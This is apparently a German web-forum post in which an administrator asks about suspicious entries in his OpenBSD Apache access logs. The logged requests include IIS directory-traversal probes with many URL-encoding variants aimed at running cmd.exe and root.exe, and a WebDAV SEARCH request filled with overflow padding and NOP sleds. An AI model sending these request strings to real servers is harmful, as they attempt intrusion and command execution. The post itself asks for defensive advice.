hi
mir ist aufgefallen, dass in den logdateien meines webservers häufig einträge wie unten gelistet auftauchen. bisher ist nichts schlimmes passiert, aber ich wollte trotzdem mal fragen, ob diese aufrufe eine gefahr sein könnten:
Code
- 62.219.250.81 - - [21/Nov/2004:05:10:22 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
- 62.219.250.81 - - [21/Nov/2004:05:10:22 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280
- 62.219.250.81 - - [21/Nov/2004:05:10:22 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
- 62.219.250.81 - - [21/Nov/2004:05:10:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
- 62.219.250.81 - - [21/Nov/2004:05:10:23 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
- 62.219.250.81 - - [21/Nov/2004:05:10:23 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
- 62.219.250.81 - - [21/Nov/2004:05:10:24 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
- 62.219.250.81 - - [21/Nov/2004:05:10:24 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337
- 62.219.250.81 - - [21/Nov/2004:05:10:25 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
- 62.219.250.81 - - [21/Nov/2004:05:10:25 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
- 62.219.250.81 - - [21/Nov/2004:05:10:25 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
- 62.219.250.81 - - [21/Nov/2004:05:10:26 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
- 62.219.250.81 - - [21/Nov/2004:05:10:26 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
- 62.219.250.81 - - [21/Nov/2004:05:10:27 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
- 62.219.250.81 - - [21/Nov/2004:05:10:27 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
- 62.219.250.81 - - [21/Nov/2004:05:10:27 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
- ...
- 83.117.56.126 - - [23/Nov/2004:19:51:37 +0100] "SEARCH /\x90\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- \uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
- ...
- \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
- \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
- \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
- \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
- \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
- \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
- \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 343
gerade zweiteres sieht mir doch irgendwie nach einem bufferoverflow versuch aus. das ganze erstreckt sich über einige logfile seiten. das hier ist nur ein auszug. das system ist ein openbsd mit der eigenen apache implementation.
irgendwelche comments/erfahrungen zu dem thema?
ganto